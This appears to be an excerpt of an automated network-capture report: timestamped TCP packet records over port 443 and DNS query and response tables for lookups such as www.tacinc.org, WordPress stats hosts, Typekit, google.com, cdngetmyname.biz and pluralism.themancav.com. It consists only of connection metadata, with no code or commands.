                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.617662907 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.617660999 CEST49884443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.617676020 CEST44349884141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.617713928 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.617731094 CEST49886443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.617731094 CEST49884443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.617747068 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.617774010 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.617815971 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.617820024 CEST49886443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.617841959 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.617896080 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.617904902 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.617995024 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.618012905 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.618026972 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.618057013 CEST49886443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.618072987 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.618079901 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.618088961 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.618128061 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.618174076 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.618190050 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.618228912 CEST49886443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.618246078 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.618288994 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.618369102 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.618386030 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.618505955 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.618561983 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.618567944 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.618607044 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.618701935 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.618705988 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.618727922 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.618757963 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.618829966 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.618911028 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.618930101 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.618937016 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.618958950 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.619002104 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.619045019 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.619050980 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.619205952 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.619761944 CEST49884443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.619793892 CEST44349884141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.619932890 CEST44349893141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.620018959 CEST44349893141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.620088100 CEST44349893141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.620119095 CEST49893443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.620130062 CEST49893443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.621012926 CEST4434988713.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.621274948 CEST4434988713.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.621337891 CEST49887443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.621500969 CEST49887443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.621500969 CEST49887443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.621516943 CEST4434988713.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.621522903 CEST4434988713.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.621831894 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.621887922 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.622124910 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.622140884 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.622212887 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.622433901 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.622515917 CEST49886443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.622530937 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.622675896 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.622785091 CEST49886443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.622800112 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.622862101 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.622904062 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.622910976 CEST49886443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.622921944 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.622935057 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.622965097 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.622967958 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.622993946 CEST49886443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.622998953 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.622998953 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.623009920 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.623019934 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.623047113 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.623050928 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.623084068 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.623085022 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.623090029 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.623091936 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.623107910 CEST49886443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.623120070 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.623121023 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.623147964 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.623168945 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.623224020 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.623229980 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.623337984 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.623508930 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.623617887 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.625113964 CEST49893443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.625125885 CEST44349893141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.625211000 CEST4434989413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.625925064 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.625971079 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.625993013 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.625999928 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.626039028 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.626053095 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.627120018 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.627182007 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.627218008 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.627218008 CEST49886443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.627238989 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.627285957 CEST49886443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.627506971 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.627527952 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.627551079 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.627572060 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.627631903 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.627645016 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.627651930 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.627672911 CEST49886443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.627676010 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.627686977 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.627780914 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.627850056 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.627857924 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.627899885 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.627914906 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.627949953 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.627975941 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.628012896 CEST49886443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.628026009 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.628082037 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.628125906 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.628145933 CEST49886443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.628160954 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.628241062 CEST49886443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.628305912 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.628364086 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.628705978 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.628777027 CEST49886443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.629271030 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.629324913 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.629410982 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.629482985 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.629509926 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.629564047 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.629625082 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.629714012 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.630316973 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.630337954 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.630362034 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.630374908 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.630388975 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.630422115 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.630429983 CEST49886443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.630441904 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.630454063 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.631288052 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.631341934 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.631633043 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.631688118 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.631731033 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.631788015 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.631850958 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.631916046 CEST49886443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.631928921 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.631977081 CEST49886443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.633192062 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.633281946 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.633351088 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.633488894 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.633719921 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.633771896 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.633802891 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.633810997 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.633857965 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.633868933 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.635432005 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.635520935 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.635555029 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.635561943 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.635576963 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.635998964 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.636058092 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.636064053 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.636308908 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.636928082 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.637001991 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.637113094 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.637185097 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.637465000 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.637526989 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.637692928 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.637789011 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.637969971 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.637979984 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.638012886 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.638025045 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.638039112 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.638062000 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.638081074 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.638092041 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.638149977 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.638190985 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.638237000 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.638278961 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.638330936 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.639394999 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                              Oct 23, 2024 20:03:58.243663073 CEST192.168.2.61.1.1.10x1b13Standard query (0)www.tacinc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:03:58.244693041 CEST192.168.2.61.1.1.10x69c6Standard query (0)www.tacinc.org65IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:03:59.139463902 CEST192.168.2.61.1.1.10xb0afStandard query (0)www.tacinc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:03:59.139518976 CEST192.168.2.61.1.1.10x987eStandard query (0)www.tacinc.org65IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.301498890 CEST192.168.2.61.1.1.10x3035Standard query (0)stats.wp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.305675030 CEST192.168.2.61.1.1.10xf443Standard query (0)use.typekit.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.305675030 CEST192.168.2.61.1.1.10xedaaStandard query (0)stats.wp.com65IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.305675030 CEST192.168.2.61.1.1.10x78faStandard query (0)use.typekit.net65IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.972588062 CEST192.168.2.61.1.1.10xe1c5Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.972734928 CEST192.168.2.61.1.1.10x775eStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:01.806907892 CEST192.168.2.61.1.1.10xe2a4Standard query (0)p.typekit.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:01.807059050 CEST192.168.2.61.1.1.10xf7c4Standard query (0)p.typekit.net65IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.002979040 CEST192.168.2.61.1.1.10x9645Standard query (0)www.tacinc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.003142118 CEST192.168.2.61.1.1.10xa15eStandard query (0)www.tacinc.org65IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.328672886 CEST192.168.2.61.1.1.10xde75Standard query (0)cdngetmyname.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.329199076 CEST192.168.2.61.1.1.10x60b2Standard query (0)cdngetmyname.biz65IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.774386883 CEST192.168.2.61.1.1.10x88adStandard query (0)stats.wpmucdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.774715900 CEST192.168.2.61.1.1.10xaed6Standard query (0)stats.wpmucdn.com65IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.660099983 CEST192.168.2.61.1.1.10x368fStandard query (0)pluralism.themancav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.660551071 CEST192.168.2.61.1.1.10x6e7bStandard query (0)pluralism.themancav.com65IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.667306900 CEST192.168.2.61.1.1.10x32b2Standard query (0)cdngetmyname.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.667532921 CEST192.168.2.61.1.1.10xc957Standard query (0)cdngetmyname.biz65IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.895658016 CEST192.168.2.61.1.1.10xa515Standard query (0)stats1.wpmudev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.896106958 CEST192.168.2.61.1.1.10x8edbStandard query (0)stats1.wpmudev.com65IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:08.615741014 CEST192.168.2.61.1.1.10xe73dStandard query (0)stats.wpmucdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:08.615998983 CEST192.168.2.61.1.1.10xddb5Standard query (0)stats.wpmucdn.com65IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.338157892 CEST192.168.2.61.1.1.10xdf45Standard query (0)pixel.wp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.338277102 CEST192.168.2.61.1.1.10x8abeStandard query (0)pixel.wp.com65IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.128093004 CEST192.168.2.61.1.1.10x2ef7Standard query (0)pixel.wp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.128261089 CEST192.168.2.61.1.1.10x94aaStandard query (0)pixel.wp.com65IN (0x0001)false
                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                              Oct 23, 2024 20:03:58.405366898 CEST1.1.1.1192.168.2.60x1b13No error (0)www.tacinc.org141.193.213.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:03:58.405366898 CEST1.1.1.1192.168.2.60x1b13No error (0)www.tacinc.org141.193.213.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:03:59.221271992 CEST1.1.1.1192.168.2.60xb0afNo error (0)www.tacinc.org141.193.213.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:03:59.221271992 CEST1.1.1.1192.168.2.60xb0afNo error (0)www.tacinc.org141.193.213.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.309365034 CEST1.1.1.1192.168.2.60x3035No error (0)stats.wp.com192.0.76.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.313905954 CEST1.1.1.1192.168.2.60xf443No error (0)use.typekit.netuse-stls.adobe.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.313956022 CEST1.1.1.1192.168.2.60x78faNo error (0)use.typekit.netuse-stls.adobe.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.980351925 CEST1.1.1.1192.168.2.60x775eNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.980590105 CEST1.1.1.1192.168.2.60xe1c5No error (0)www.google.com142.250.186.68A (IP address)IN (0x0001)false
